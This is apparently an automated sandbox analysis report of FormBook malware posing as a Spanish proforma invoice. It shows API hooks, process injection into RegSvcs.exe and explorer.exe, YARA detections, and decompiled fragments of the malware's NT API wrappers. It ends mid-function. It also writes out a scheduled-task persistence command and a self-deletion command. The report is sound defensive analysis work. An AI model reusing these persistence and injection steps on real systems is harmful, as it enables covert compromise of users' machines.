                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0

                                              System Behavior

                                              General

                                              Start time: 20:34:13
                                              Start date: 13/10/2021
                                              Path: C:\Users\user\Desktop\Factura de proforma.exe
                                              Wow64 process (32bit): true
                                              Commandline: 'C:\Users\user\Desktop\Factura de proforma.exe'
                                              Imagebase: 0x7a0000
                                              File size: 495616 bytes
                                              MD5 hash: 16F7045EEBB451234CA8078222C5994C
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: .Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation: low

                                              General

                                              Start time: 20:34:24
                                              Start date: 13/10/2021
                                              Path: C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit): true
                                              Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
                                              Imagebase: 0x1070000
                                              File size: 185856 bytes
                                              MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              General

                                              Start time: 20:34:24
                                              Start date: 13/10/2021
                                              Path: C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit): false
                                              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase: 0x7ff7f20f0000
                                              File size: 625664 bytes
                                              MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              General

                                              Start time: 20:34:25
                                              Start date: 13/10/2021
                                              Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit): true
                                              Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Imagebase: 0xb80000
                                              File size: 45152 bytes
                                              MD5 hash: 2867A3817C9245F7CF518524DFD18F28
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation: high

                                              General

                                              Start time: 20:34:26
                                              Start date: 13/10/2021
                                              Path: C:\Windows\explorer.exe
                                              Wow64 process (32bit): false
                                              Commandline: C:\Windows\Explorer.EXE
                                              Imagebase: 0x7ff720ea0000
                                              File size: 3933184 bytes
                                              MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation: high

                                              General

                                              Start time: 20:35:00
                                              Start date: 13/10/2021
                                              Path: C:\Windows\SysWOW64\cscript.exe
                                              Wow64 process (32bit): true
                                              Commandline: C:\Windows\SysWOW64\cscript.exe
                                              Imagebase: 0x260000
                                              File size: 143360 bytes
                                              MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation: moderate

                                              General

                                              Start time: 20:35:04
                                              Start date: 13/10/2021
                                              Path: C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit): true
                                              Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                              Imagebase: 0xd80000
                                              File size: 232960 bytes
                                              MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              General

                                              Start time: 20:35:05
                                              Start date: 13/10/2021
                                              Path: C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit): false
                                              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase: 0x7ff7f20f0000
                                              File size: 625664 bytes
                                              MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges: false
                                              Has administrator privileges: false
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296A516
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: DO$DO
                                                • API String ID: 4139908857-1331050724
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0296C7BE,?,?,?,?,?), ref: 0296C87F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0296C7BE,?,?,?,?,?), ref: 0296C87F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070C2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.326126927.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296A516
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070C2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.326126927.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t4 =  &_a40; // 0x414a31
                                                				_t6 =  &_a32; // 0x414d72
                                                				_t12 =  &_a8; // 0x414d72
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                				return _t18;
                                                			}







                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA
                                                • API String ID: 2738559852-782607585
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_v8 =  &_v536;
                                                				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041D070(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041D2F0( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E0041B4A0(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}






                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t23;
                                                				void* _t33;
                                                
                                                				asm("out 0x4b, al");
                                                				 *0x8bec8b55 =  *0x8bec8b55 & __eax - 0x00000091;
                                                				_t17 = _a4;
                                                				_t3 = _t17 + 0xc40; // 0xc40
                                                				E0041AF60(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t23;
                                                			}






                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E0041A53A(void* __eax, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t16;
                                                				void* _t23;
                                                
                                                				asm("aas");
                                                				_t12 = _a4;
                                                				_t3 = _t12 + 0xc60; // 0xca0
                                                				E0041AF60(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t16;
                                                			}






                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}






                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A490(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a943
                                                				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}






                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateFree
                                                • String ID: 6EA
                                                • API String ID: 2488874121-1400015478
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E0041A806(void* __edi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				void* __ebp;
                                                				int _t18;
                                                				void* _t25;
                                                
                                                				asm("in al, 0x6e");
                                                				if(__eflags < 0) {
                                                					asm("daa");
                                                					_t25 = __edi - 1;
                                                					asm("loope 0x57");
                                                					_t15 = _a4;
                                                					E0041AF60(_t25, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
                                                					_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                					return _t18;
                                                				} else {
                                                					if (__eflags < 0) goto L6;
                                                				}
                                                			}







                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 7d65c19931cba949d74fdcd9560ac0d205cca2ec8780b5c3630a5e300f37c96e
                                                • Instruction ID: 08ff7fbf91921929e98d3eab7152402f061d2df424c27a3aa53a784102fc98a1
                                                • Opcode Fuzzy Hash: 7d65c19931cba949d74fdcd9560ac0d205cca2ec8780b5c3630a5e300f37c96e
                                                • Instruction Fuzzy Hash: 501102B12012086FD710EF98DC85EE737A8EF85724F148466FD0C9B342D535EA6187E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 19%
                                                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				long _t21;
                                                				void* _t24;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                
                                                				_v68 = 0;
                                                				E0041BE60( &_v67, 0, 0x3f);
                                                				E0041CA00( &_v68, 3);
                                                				_t24 = _a4 + 0x1c;
                                                				_t12 = E0040ACF0(_t24, _t24,  &_v68); // executed
                                                				_push(0xc4e7b6d6);
                                                				_push(0);
                                                				_push(0);
                                                				_push(_t12);
                                                				_push(_t24);
                                                				_t13 = E00414E50();
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t33 = _t14;
                                                					if(_t14 == 0) {
                                                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                					}
                                                					return _t14;
                                                				}
                                                				return _t13;
                                                			}













                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: ee276f1ef661cf63882cdaf779ebc2aeb5d586def019d84a84c5ecfb163201ae
                                                • Instruction ID: 7e96499203170bea1d34153ca5a10a7836bfc5a2e72c6933cd3c7ae4462c884d
                                                • Opcode Fuzzy Hash: ee276f1ef661cf63882cdaf779ebc2aeb5d586def019d84a84c5ecfb163201ae
                                                • Instruction Fuzzy Hash: E2F0213678021C62E31465597C43BFF73549BC0B25F14017FFE48EA2C1E9B9545642E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
